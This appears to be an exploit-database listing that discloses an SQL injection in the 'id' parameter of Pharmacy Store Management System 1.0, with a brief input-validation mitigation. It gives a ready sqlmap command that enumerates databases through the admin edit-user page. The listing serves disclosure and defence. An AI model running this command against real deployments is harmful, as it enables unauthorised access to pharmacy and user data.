header-logo
Suggest Exploit
vendor:
Pharmacy Store Management System
by:
Aydın Baran Ertemir
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Pharmacy Store Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:pharmacy_store_management_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2020

Pharmacy Store Management System 1.0 – ‘id’ SQL Injection

This exploit allows an attacker to inject malicious SQL code into the 'id' parameter of the Pharmacy Store Management System 1.0. This can be done by using the SQLMAP tool, which can be used to identify databases and tables in the system. The command to use is 'sqlmap -u 'http://localhost/pharmacy1/admin/edituser?id=1' --dbs --batch'

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Pharmacy Store Management System 1.0 - 'id' SQL Injection
# Google Dork: N/A
# Date: 1.12.2020
# Exploit Author: Aydın Baran Ertemir
# Vendor Homepage: https://www.sourcecodester.com/php/13225/pharmacy-store-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13225&title=Pharmacy+Store+Management+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Kali Linux

Use SQLMAP:

sqlmap -u 'http://localhost/pharmacy1/admin/edituser?id=1' --dbs --batch

Navigation

Suggest Exploit

Services By CQR